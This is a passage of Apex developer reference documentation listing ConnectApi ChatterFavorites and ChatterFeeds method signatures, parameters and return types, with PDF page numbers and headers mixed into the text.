Use either the ID for a community, internal, or null.
subjectId
Type: String
Specify the ID for the context user or the alias me.
favoriteId
Type: String
The ID of a favorite.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedItems(String, String, String)
Testing ConnectApi Code
571
Reference
ChatterFavorites Class
API Version
28.031.0
Signature
public static Void setTestGetFeedItems(String communityId, String subjectId, String
favoriteId, String pageParam, Integer pageSize, FeedSortOrder sortParam,
ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
Specify the ID for the context user or the alias me.
favoriteId
Type: String
The ID of a favorite.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
572
Reference
ChatterFavorites Class
Return Value
Type: Void
SEE ALSO:
getFeedItems(String, String, String, String, Integer, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
29.031.0
Signature
public static Void setTestGetFeedItems(String communityId, String subjectId, String
favoriteId, Integer recentCommentCount, String pageParam, Integer pageSize, FeedSortOrder
sortParam, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
Specify the ID for the context user or the alias me.
favoriteId
Type: String
The ID of a favorite.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
573
Reference
ChatterFeeds Class
sortParam
Type: FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedItems(String, String, String, Integer, String, Integer, FeedSortOrder)
Testing ConnectApi Code
ChatterFeeds Class
Get, post, and delete feed items, likes, comments, and bookmarks. You can also search feed items, share feed items, and vote on polls.
Namespace
ConnectApi
Usage
In API versions 30.0 and earlier, a Chatter feed was a container of feed items. In API version 31.0, the definition of a feed expanded to
include new objects that didnt entirely fit the feed item model. The Chatter feed became a container of feed elements. The abstract class
ConnectApi.FeedElement was introduced as a parent class to the existing ConnectApi.FeedItem class and the subset
of properties that feed elements share was moved into the ConnectApi.FeedElement class. Because feeds and feed elements
are the core of Chatter, understanding them is crucial to developing applications with Chatter in Apex. For detailed information, see
Working with Feeds and Feed Elements.
Important: Feed item methods arent available in version 32.0. In version 32.0 and later, use feed element methods.
Message segments in a feed item are typed as ConnectApi.MessageSegment. Feed item capabilities are typed as
ConnectApi.FeedItemCapability. Record fields are typed as ConnectApi.AbstractRecordField. These classes
are all abstract and have several concrete subclasses. At runtime you can use instanceof to check the concrete types of these objects
and then safely proceed with the corresponding downcast. When you downcast, you must have a default case that handles unknown
subclasses.
Important: The composition of a feed may change between releases. Your code should always be prepared to handle instances
of unknown subclasses.
574
Reference
ChatterFeeds Class
ChatterFeeds Methods
The following are methods for ChatterFeeds. All methods are static.
IN THIS SECTION:
deleteComment(String, String)
Deletes the specified comment. You can find a comment ID in any feed, such as a news feed or a record feed.
deleteFeedElement(String, String)
Deletes the specified feed element.
deleteFeedItem(String, String)
Deletes the specified feed item.
deleteLike(String, String)
Deletes the specified like. This can be a like on a comment or a feed item.
getComment(String, String)
Returns the specified comment.
getCommentsForFeedElement(String, String)
Get the comments for a specified feed element.
getCommentsForFeedElement(String, String, String, Integer)
Returns the specified page of comments for the specified feed element.
getCommentsForFeedItem(String, String)
Returns the first page of comments for the feed item. The page contains the default number of items.
getCommentsForFeedItem(String, String, String, Integer)
Returns the specified page of comments for the specified feed item.
getFeed(String, ConnectApi.FeedType)
Returns information about the feed for the specified feed type.
getFeed(String, ConnectApi.FeedType, ConnectApi.FeedSortOrder)
Returns the feed for the specified feed type in the specified order.
getFeed(String, ConnectApi.FeedType, String)
Returns the feed for the specified feed type for the specified user.
getFeed(String, ConnectApi.FeedType, String, ConnectApi.FeedSortOrder)
Returns the feed for the specified feed type for the specified user, in the specified order.
getFeedDirectory(String)
Returns a list of all feeds available to the context user.
getFeedElement(String, String)
Returns information about the specified feed element.
getFeedElement(String, String, Integer, Integer)
Returns information about the specified feed element with the specified number of elements per bundle including no more than
the specified number of comments per feed element.
getFeedElementBatch(String, List<String>)
Get information about the specified list of feed elements. Returns errors embedded in the results for feed elements that couldnt be
loaded.
575
Reference
ChatterFeeds Class
getFeedElementPoll(String, String)
Returns the poll associated with the feed element.
getFeedElementsFromBundle(String, String)
Returns the first page of feed-elements from a bundle.
getFeedElementsFromBundle(String, String, String, Integer, Integer, Integer)
Returns the feed elements on the specified page for the bundle. Each feed element includes no more than the specified number of
comments. Specify the maximum number of feed elements in a bundle.
getFeedElementsFromFeed(String, ConnectApi.FeedType)
Returns the first page of feed elements from the Company, Home, and Moderation feed types. The page contains the default
number of items.
getFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedSortOrder)
Returns the feed items for the specified page for the Company, Home, and Moderation feed types, in the specified order.
getFeedElementsFromFeed(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder)
Returns the feed elements for the specified page for the Company, Home, and Moderation feed types, in the specified order.
Each feed element contains no more than the specified number of comments.
getFeedElementsFromFeed(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder,
ConnectApi.FeedFilter)
Returns the feed elements for the specified page for the Home feed type, with the specified filter in the specified order. Each feed
element contains no more than the specified number of comments.
getFeedElementsFromFeed(String, ConnectApi.FeedType, String)
Returns the first page of feed elements for the specified feed type, for the specified user or record. The page contains the default
number of elements.
getFeedElementsFromFeed(String, ConnectApi.FeedType, String, String, Integer, ConnectApi.FeedSortOrder)
Returns the feed elements on the specified page for the specified user or record, for the specified feed type in the specified order.
getFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder)
Returns the feed elements on the specified page for the specified user or record, for the specified feed type in the specified order.
Each feed element includes no more than the specified number of comments.
getFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, Boolean)
Returns the feed elements on the specified page for the specified user or record, for the specified feed type in the specified order.
Each feed element includes no more than the specified number of comments. Specify whether to return feed elements posted by
internal (non-community) users only.
getFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, Boolean)
Returns the feed elements on the specified page for the specified user or record, for the specified feed type in the specified order.
Each feed element includes no more than the specified number of comments. Specify whether to return feed elements posted by
internal (non-community) users only. Specify the maximum number of feed elements in a bundle.
getFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, Boolean, ConnectApi.FeedFilter)
Returns the feed elements on the specified page for the specified user or record, for the specified feed type in the specified order.
Each feed element includes no more than the specified number of comments. Specify whether to return feed elements posted by
internal (non-community) users only. Specify the maximum number of feed elements in a bundle and the feed filter.
576
Reference
ChatterFeeds Class
577
Reference
ChatterFeeds Class
getFeedItemsFromFeed(String, ConnectApi.FeedType)
Returns the first page of feed items for the Company, Home, and Moderation feed types. The page contains the default number
of items.
getFeedItemsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedSortOrder)
Returns the feed items for the specified page for the Company, Home, and Moderation feed types, in the specified order.
getFeedItemsFromFeed(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder)
Returns the feed items for the specified page for the Company, Home, and Moderation feed types, in the specified order. Each
feed item contains no more than the specified number of comments.
getFeedItemsFromFeed(String, ConnectApi.FeedType, String)
Returns the first page of feed items for the specified feed type, for the specified user. The page contains the default number of items.
getFeedItemsFromFeed(String, ConnectApi.FeedType, String, String, Integer, ConnectApi.FeedSortOrder)
Returns the feed items on the specified page for the specified user, for the specified feed type in the specified order.
getFeedItemsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder)
Returns the feed items on the specified page for the specified user, for the specified feed type in the specified order. Each feed item
includes no more than the specified number of comments.
getFeedItemsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, Boolean)
Returns the feed items on the specified page for the specified user, for the Record feed type in the specified order. Each feed item
includes no more than the specified number of comments. Specify whether to return feed items posted by internal (non-community)
users only.
getFeedItemsFromFilterFeed(String, String, String)
Returns the first page of feed items for the specified user and the specified key prefix. The page contains the default number of items.
getFeedItemsFromFilterFeed(String, String, String, String, Integer, ConnectApi.FeedSortOrder)
Returns the specified page of feed items for the specified user and the specified key prefix, in the specified order.
getFeedItemsFromFilterFeed(String, String, String, Integer, ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder)
Returns the specified page of feed items for the specified user and the specified key prefix, in the specified order. Each feed item
contains no more than the specified number of comments.
getFeedItemsFromFilterFeedUpdatedSince(String, String, String, Integer, ConnectApi.FeedDensity, String, Integer, String)
Returns the specified page of feed items for the specified user and the specified key prefix. Includes only feed items that have been
updated since the time specified in the updatedSince parameter.
getFeedItemsUpdatedSince(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer, String)
Returns the specified page of feed items for the Company, Home, and Moderation feed types. Includes only feed items that
have been updated since the time specified in the updatedSince parameter. Each feed item contains no more than the specified
number of comments.
getFeedItemsUpdatedSince(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer, String)
Returns the specified page of feed items for the Files, Groups, News, People, and Record feed types. Includes only feed
items that have been updated since the time specified in the updatedSince parameter. Each feed item contains no more than
the specified number of comments.
getFeedItemsUpdatedSince(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer, String, Boolean)
Returns the specified page of feed items for the Record feed type. Includes only feed items that have been updated since the
time specified in the updatedSince parameter. Specify whether to return feed items posted by internal (non-community) users
only.
578
Reference
ChatterFeeds Class
getFeedPoll(String, String)
Returns the poll associated with the feed item.
getFilterFeed(String, String, String)
Returns the first page of a feed for the specified user and the given key prefix.
getFilterFeed(String, String, String, ConnectApi.FeedType)
Returns the first page of a feed in the specified order for the specified user and the given key prefix.
getFilterFeedDirectory(String, String)
Gets a feed directory object that contains a list of filter feeds available to the context user. A filter feed is the news feed filtered to
include feed items whose parent is a specific entity type.
getLike(String, String)
Returns the specified like.
getLikesForComment(String, String)
Returns the first page of likes for the specified comment. The page contains the default number of items.
getLikesForComment(String, String, Integer, Integer)
Returns the specified page of likes for the specified comment.
getLikesForFeedElement(String, String)
Get the first page of likes for a feed element.
getLikesForFeedElement(String, String, Integer, Integer)
Returns the specified page of likes for a feed element.
getLikesForFeedItem(String, String)
Returns the first page of likes for the specified feed item. The page contains the default number of items.
getLikesForFeedItem(String, String, Integer, Integer)
Returns the specified page of likes for the specified feed item.
isModified(String, ConnectApi.FeedType, String, String)
Returns information about whether a news feed has been updated or changed. Use this method to poll a news feed for updates.
likeComment(String, String)
Adds a like to the specified comment for the context user. If the user has already liked this comment, this is a non-operation and
returns the existing like.
likeFeedElement(String, String)
Like a feed element.
likeFeedItem(String, String)
Adds a like to the specified feed item for the context user. If the user has already liked this feed item, this is a non-operation and
returns the existing like.
postComment(String, String, String)
Adds the specified text as a comment to the feed item, for the context user.
postComment(String, String, ConnectApi.CommentInput, ConnectApi.BinaryInput)
Adds a comment to the feed item from the context user. Use this method to use rich text, including mentions, and to attach a file
to a comment.
postCommentToFeedElement(String, String, String)
Post a plain text comment to a feed element.
579
Reference
ChatterFeeds Class
580
Reference
ChatterFeeds Class
581
Reference
ChatterFeeds Class
582
Reference
ChatterFeeds Class
deleteComment(String, String)
Deletes the specified comment. You can find a comment ID in any feed, such as a news feed or a record feed.
API Version
28.0
Requires Chatter
Yes
Signature
public static Void deleteComment(String communityId, String commentId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
commentId
Type: String
The ID for a comment.
Return Value
Type: Void
deleteFeedElement(String, String)
Deletes the specified feed element.
API Version
31.0
Requires Chatter
Yes
Signature
public static deleteFeedElement(String communityId, String feedElementId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
583
Reference
ChatterFeeds Class
feedElementId
Type: String
The ID for a feed element.
Return Value
Type: Void
deleteFeedItem(String, String)
Deletes the specified feed item.
API Version
28.031.0
Important: In version 32.0 and later, use deleteFeedElement(String, String).
Requires Chatter
Yes
Signature
public static Void deleteFeedItem(String communityId, String feedItemId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedItemId
Type: String
The ID for a feed item.
Return Value
Type: Void
deleteLike(String, String)
Deletes the specified like. This can be a like on a comment or a feed item.
API Version
28.0
584
Reference
ChatterFeeds Class
Requires Chatter
Yes
Signature
public static Void deleteLike(String communityId, String likeId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
likeId
Type: String
The ID for a like.
Return Value
Type: Void
getComment(String, String)
Returns the specified comment.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.Comment getComment(String communityId, String commentId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
commentId
Type: String
The ID for a comment.
585
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.Comment
getCommentsForFeedElement(String, String)
Get the comments for a specified feed element.
API Version
32.0
Requires Chatter
Yes
Signature
public static ConnectApi.CommentPage getCommentsForFeedElement(String communityId,
String feedElementId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
Return Value
Type: ConnectApi.CommentPage
If the feed element doesnt support the Comments capability, the return value is ConnectApi.NotFoundException on page
1086.
API Version
32.0
586
Reference
ChatterFeeds Class
Requires Chatter
Yes
Signature
public static ConnectApi.CommentPage getCommentsForFeedElement(String communityId,
String feedElementId, String pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
pageParam
Type: String
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
The number of comments per page. Valid values are between 1 and 100. If you pass null, the default size is 25.
Return Value
Type: ConnectApi.CommentPage Class
If the feed element doesnt support the Comments capability, the return value is ConnectApi.NotFoundException on page
1086.
getCommentsForFeedItem(String, String)
Returns the first page of comments for the feed item. The page contains the default number of items.
API Version
28.031.0
Important: In version 32.0 and later, use getCommentsForFeedElement(String, String).
587
Reference
ChatterFeeds Class
Requires Chatter
Yes
Signature
public static ConnectApi.CommentPage getCommentsForFeedItem(String communityId, String
feedItemId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedItemId
Type: String
The ID for a feed item.
Return Value
Type: ConnectApi.CommentPage
API Version
28.031.0
Important: In version 32.0 and later, use getCommentsForFeedElement(String, String, String, Integer).
Requires Chatter
Yes
Signature
public static ConnectApi.CommentPage getCommentsForFeedItem(String communityId, String
feedItemId, String pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
588
Reference
ChatterFeeds Class
feedItemId
Type: String
The ID for a feed item.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.CommentPage
getFeed(String, ConnectApi.FeedType)
Returns information about the feed for the specified feed type.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.Feed getFeed(String communityId, ConnectApi.FeedType feedType)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
Return Value
Type: ConnectApi.Feed
589
Reference
ChatterFeeds Class
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.Feed getFeed(String communityId, ConnectApi.FeedType feedType,
ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.Feed
API Version
28.0
590
Reference
ChatterFeeds Class
Requires Chatter
Yes
Signature
public static ConnectApi.Feed getFeed(String communityId, ConnectApi.FeedType feedType,
String subjectId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
Return Value
Type: ConnectApi.Feed
API Version
28.0
Requires Chatter
Yes
591
Reference
ChatterFeeds Class
Signature
public static ConnectApi.Feed getFeed(String communityId, ConnectApi.FeedType feedType,
String subjectId, ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.Feed
getFeedDirectory(String)
Returns a list of all feeds available to the context user.
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedDirectory getFeedDirectory(String communityId)
592
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
Return Value
Type: ConnectApi.FeedDirectory
getFeedElement(String, String)
Returns information about the specified feed element.
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElement getFeedElement(String communityId, String
feedElementId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
Return Value
Type: ConnectApi.FeedElement
593
Reference
ChatterFeeds Class
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElement getFeedElement(String communityId, String
feedElementId, Integer recentCommentCount, Integer elementsPerBundle)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
elementsPerBundle
Type: Integer
The maximum number of feed elements per bundle. The default and maximum value is 10.
Return Value
Type: ConnectApi.FeedElement
getFeedElementBatch(String, List<String>)
Get information about the specified list of feed elements. Returns errors embedded in the results for feed elements that couldnt be
loaded.
API Version
31.0
594
Reference
ChatterFeeds Class
Requires Chatter
Yes
Signature
public static ConnectApi.BatchResult[] getFeedElementBatch(String communityId,
List<String> feedElementIds)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementIds
Type: String
A list of up to 500 feed element IDs.
Return Value
Type: BatchResult[]
The BatchResult getResults() method returns a ConnectApi.FeedElement object.
getFeedElementPoll(String, String)
Returns the poll associated with the feed element.
API Version
32.0
Requires Chatter
Yes
Signature
public static ConnectApi.PollCapability getFeedElementPoll(String communityId, String
feedElementId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
595
Reference
ChatterFeeds Class
feedElementId
Type: String
The ID for a feed element.
Return Value
Type: ConnectApi.PollCapability
Note: Triggers on FeedItem objects run before their attachment and capabilities information is saved, which means that
ConnectApi.FeedItem.attachment information and ConnectApi.FeedElement.capabilities information
may not be available in the trigger.
getFeedElementsFromBundle(String, String)
Returns the first page of feed-elements from a bundle.
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsFromBundle(String communityId,
String feedElementId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
Return Value
Type: ConnectApi.FeedElementPage Class
596
Reference
ChatterFeeds Class
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsFromBundle(String communityId,
String feedElementId, String pageParam, Integer pageSize, Integer elementsPerBundle,
Integer recentCommentCount)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
pageParam
Type: String
Specifies the page token to be used to view a page of information. Page tokens are returned as part of the response class, such as
currentPageToken or nextPageToken. If you pass in null, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
elementsPerBundle
Type: Integer
The maximum number of feed elements per bundle. The default and maximum value is 10.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
Return Value
Type: ConnectApi.FeedElementPage Class
getFeedElementsFromFeed(String, ConnectApi.FeedType)
Returns the first page of feed elements from the Company, Home, and Moderation feed types. The page contains the default
number of items.
597
Reference
ChatterFeeds Class
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
Return Value
Type: ConnectApi.FeedElementPage Class
SEE ALSO:
setTestGetFeedElementsFromFeed(String, ConnectApi.FeedType, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
31.0
Requires Chatter
Yes
598
Reference
ChatterFeeds Class
Signature
public static ConnectApi.FeedElementPage getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedElementPage Class
SEE ALSO:
setTestGetFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedSortOrder,
ConnectApi.FeedElementPage)
Testing ConnectApi Code
599
Reference
ChatterFeeds Class
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
600
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestGetFeedElementsFromFeed(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
32.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam,
ConnectApi.FeedFilter filter)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
601
Reference
ChatterFeeds Class
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
filter
Type: ConnectApi.FeedFilter
Specifies the feed filters.
AllQuestionsOnly feed elements that are questions.
SolvedQuestionsOnly feed elements that are questions and that have a best answer.
UnansweredQuestionsOnly feed elements that are questions and that dont have any answers.
UnsolvedQuestionsOnly feed elements that are questions and that dont have a best answer.
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestGetFeedElementsFromFeed(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, ConnectApi.FeedFilter, ConnectApi.FeedElementPage)
602
Reference
ChatterFeeds Class
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestGetFeedElementsFromFeed(String, ConnectApi.FeedType, String, ConnectApi.FeedElementPage)
Testing ConnectApi Code
603
Reference
ChatterFeeds Class
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
The page contains the default number of items.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
604
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestGetFeedElementsFromFeed(String, ConnectApi.FeedType, String, String, Integer, ConnectApi.FeedSortOrder,
ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
605
Reference
ChatterFeeds Class
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
